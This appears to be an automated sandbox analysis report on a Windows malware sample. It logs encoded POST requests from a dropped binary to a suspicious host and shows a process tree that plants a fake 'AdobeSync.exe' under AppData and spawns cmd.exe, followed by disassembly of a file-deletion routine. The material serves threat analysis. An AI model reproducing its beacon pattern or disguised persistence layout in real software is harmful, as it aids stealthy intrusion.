                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5ae0a517c9c-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1805&rtt_var=696&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1171&delivery_rate=1552365&cwnd=252&unsent_bytes=0&cid=e5df3a819226584c&ts=334&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                27192.168.2.750099188.114.97.34435440C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC500OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 35
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC35OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC730INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byK0fq%2Fv2e0CSPF5yexk5Ru1CuRJf9lAwbOC7EVofyDW%2Bm%2BYEzFjI8Q%2BeabpOtQHSXrzCm1buWUGbebqYa4vzgJUQqmrJ0g%2FPKz2VD7bqfTZNEVgE2xvFH2Phzvcu7klywxP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5b06d1441e6-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1748&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1171&delivery_rate=1634023&cwnd=182&unsent_bytes=0&cid=9afa504e35f93c66&ts=334&x=0"


                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:07:18:11
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\LVkAi4PBv6.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x860000
                                                                                                                                                                                                                                                                                                File size:7'012'811 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:DC1A25A3CECFD804E569A7238BA1EC7F
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                Start time:07:18:11
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552
                                                                                                                                                                                                                                                                                                Imagebase:0x5c0000
                                                                                                                                                                                                                                                                                                File size:6'305'325 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:9C540950F5A8981844FF33BFC55D2F36
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                Start time:07:18:12
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x60000
                                                                                                                                                                                                                                                                                                File size:1'219'488 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                Start time:07:18:14
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x600000
                                                                                                                                                                                                                                                                                                File size:1'219'488 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:07:18:15
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                Start time:07:18:15
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                Start time:07:18:41
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                File size:2'364'728 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                Start time:07:18:53
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x600000
                                                                                                                                                                                                                                                                                                File size:1'219'488 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                                Start time:07:18:53
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                Start time:07:18:54
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                Start time:07:19:01
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                Start time:07:19:02
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                                                Start time:07:19:02
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                Start time:07:19:03
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                Start time:07:19:08
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                                                Start time:07:19:08
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                                                Start time:07:19:16
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                File size:2'364'728 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                                                Start time:07:20:02
                                                                                                                                                                                                                                                                                                Start date:07/01/2025
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 00863CC4 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 320fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 482 863cc4-863d51 call 88f8e0 * 2 GetFileAttributesW 487 863d85-863d88 482->487 488 863d53-863d5a GetLastError 482->488 489 8640d5 487->489 490 863d8e-863d91 487->490 491 863d5f-863d61 488->491 492 863d5c-863d5e 488->492 495 8640da-8640e3 489->495 496 863d93-863da6 SetFileAttributesW 490->496 497 863dca-863dd1 490->497 493 863d63-863d6c 491->493 494 863d6e 491->494 492->491 493->494 494->487 498 863d70-863d71 494->498 499 8640e5-8640e6 FindClose 495->499 500 8640ec-8640f3 495->500 496->497 501 863da8-863dae GetLastError 496->501 502 863dd3-863dda 497->502 503 863de0-863de8 497->503 507 863d76-863d80 call 863821 498->507 499->500 508 8640f5-8640fb call 8a5636 500->508 509 864100-864112 call 88e06f 500->509 510 863db0-863db9 501->510 511 863dbb 501->511 502->503 504 864058 502->504 505 863e25-863e40 call 862d58 503->505 506 863dea-863dfe GetTempPathW 503->506 512 86405e-86406c RemoveDirectoryW 504->512 505->500 530 863e46-863e62 FindFirstFileW 505->530 506->505 513 863e00-863e06 GetLastError 506->513 507->500 508->509 510->511 518 863dc2-863dc8 511->518 519 863dbd 511->519 512->495 520 86406e-864074 GetLastError 512->520 521 863e13 513->521 522 863e08-863e11 513->522 518->507 519->518 526 864076-864079 520->526 527 86407f-864085 520->527 528 863e15 521->528 529 863e1a-863e20 521->529 522->521 526->527 531 864087-864089 527->531 532 8640a1-8640a3 527->532 528->529 529->507 533 863e64-863e6a GetLastError 530->533 534 863e89-863e93 530->534 537 8640a5-8640ab 531->537 538 86408b-86409d MoveFileExW 531->538 532->495 532->537 539 863e77 533->539 540 863e6c-863e75 533->540 535 863e95-863e9e 534->535 536 863eba-863ee0 call 862d58 534->536 541 863ea4-863eab 535->541 542 863fbd-863fcd FindNextFileW 535->542 536->495 556 863ee6-863ef3 536->556 545 863ffa-864004 call 863821 537->545 538->537 544 86409f 538->544 546 863e7e-863e7f 539->546 547 863e79 539->547 540->539 541->536 549 863ead-863eb4 541->549 551 863fcf-863fd5 542->551 552 86404d-864052 GetLastError 542->552 544->532 545->495 546->534 547->546 549->536 549->542 551->534 553 864054-864056 552->553 554 8640b0-8640b6 GetLastError 552->554 553->512 559 8640c3 554->559 560 8640b8-8640c1 554->560 557 863ef5-863ef7 556->557 558 863f22-863f29 556->558 557->558 563 863ef9-863f09 call 862b0c 557->563 561 863fb7 558->561 562 863f2f-863f31 558->562 564 8640c5 559->564 565 8640ca-8640d0 559->565 560->559 561->542 566 863f33-863f46 SetFileAttributesW 562->566 567 863f4c-863f5a DeleteFileW 562->567 563->495 574 863f0f-863f18 call 863cc4 563->574 564->565 565->545 566->567 569 863fda-863fe0 GetLastError 566->569 567->561 570 863f5c-863f5e 567->570 575 863fe2-863feb 569->575 576 863fed 569->576 572 863f64-863f81 GetTempFileNameW 570->572 573 86402b-864031 GetLastError 570->573 579 863f87-863fa4 MoveFileExW 572->579 580 864009-86400f GetLastError 572->580 581 864033-86403c 573->581 582 86403e 573->582 590 863f1d 574->590 575->576 577 863ff4-863ff5 576->577 578 863fef 576->578 577->545 578->577 586 863fa6-863fad 579->586 587 863faf 579->587 584 864011-86401a 580->584 585 86401c 580->585 581->582 588 864045-86404b 582->588 589 864040 582->589 584->585 591 864023-864029 585->591 592 86401e 585->592 593 863fb5 MoveFileExW 586->593 587->593 588->545 589->588 590->561 591->545 592->591 593->561
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00863D40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863D53
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00863D9E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863DA8
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00863DF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863E00
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00863E53
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863E64
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00863F3E
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00863F52
                                                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00863F79
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00863F9C
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00863FB5
                                                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00863FC5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863FDA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00864009
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086402B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0086404D
                                                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00864064
